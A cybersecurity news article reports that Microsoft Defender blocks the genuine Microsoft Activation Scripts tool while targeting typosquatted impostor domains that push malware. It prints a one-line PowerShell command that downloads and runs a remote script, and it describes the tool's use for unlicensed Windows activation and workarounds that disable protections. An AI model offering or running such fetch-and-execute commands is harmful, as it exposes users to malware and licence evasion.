Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Anthropic Details Claude 3.5 Sonnet Safeguards and Jailbreak Framework
July 3, 2026
Google Disrupts NetNut Residential Proxy Botnet Exploiting 2 Million Devices
July 3, 2026
AsyncRAT Campaign Leverages ScreenConnect to Evade Detection
July 2, 2026
Home/CyberSecurity News/Microsoft Defender’s Blocks Legitimate MAS Amid Fake Script Hunt
CyberSecurity News

Microsoft Defender’s Blocks Legitimate MAS Amid Fake Script Hunt

Microsoft’s Windows Defender has begun blocking the popular open-source Microsoft Activation Scripts (MAS) tool. The security solution, while targeting fake impostors, is doing so without...

David kimber
David kimber
January 9, 2026 2 Min Read
81 0

Microsoft’s Windows Defender has begun blocking the popular open-source Microsoft Activation Scripts (MAS) tool. The security solution, while targeting fake impostors, is doing so without verifying its impact on legitimate versions of the utility.

Users running the genuine PowerShell command now receive “Trojan:PowerShell/FakeMas.DA!MTB” alerts, prompting them to temporarily disable protections. This collateral damage highlights tensions between aggressive antivirus tactics and open-source utilities.

MAS, hosted on GitHub by the Massgrave team, lets users activate Windows and Office via scripts like irm https://get.activated.win | iex.

Recently, cybercriminals exploited its fame with typosquatted domains, such as get.activate.win (missing the ‘d’), to push malware-laden PowerShell payloads. Microsoft responded swiftly, updating Defender to automatically flag “FakeMas” threats.​

False Positive Fallout

Defender’s filter, meant for fakes, now mistakenly hits the official get.activated.win domain due to a likely blacklist glitch.

Screenshots circulating online show French-localized alerts: “Trojan:PowerShell/FakeMas.DA!MTB” on legitimate fetches, with options to block or connect via Microsoft. Reddit users report quarantined MAS_AIO.cmd files, fixed only by renaming or exclusions.

Affected users add folder exclusions in Windows Security or submit false positives via Microsoft’s portal. The MAS team confirmed the issue on social media and urged vigilance across the domain to avoid malware.

Disabling Defender briefly works but exposes systems, ironically, as real threats could slip through if fake domains evade blocks.

Microsoft’s move underscores Defender’s AMSI integration, which scans PowerShell scripts in real time to thwart fileless attacks. Yet, it raises questions: Did hasty updates prioritize speed over precision? Past MAS flags were dismissed as false positives, but this ties directly to anti-malware efforts.

Cybersecurity experts note that such incidents erode trust in default protections, prompting users to adopt risky tweaks.

As of January 2026, no official Microsoft fix is available; users are monitoring for updates. This saga reminds the community: Even “smart” security can stumble in the typosquatting wars.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCybersecurityExploitMalwareSecurityThreat

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Trend Micro Apex Central Vulnerabilities Enables Remote Code Execution Attacks

Next Post

Undertow HTTP Server Used in Java Apps Vulnerability Allow Attackers to Hijack Sessions

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Claude Cowork Sandbox Vulnerability Lets Attackers Run Commands as Root
July 2, 2026
Ousaban Malware Targets Iberian Banks with Phishing PDFs and VBS Downloader
July 2, 2026
Citrix Bleed (CVE-2023-4966) Critical Vulnerability Actively Exploited
July 2, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us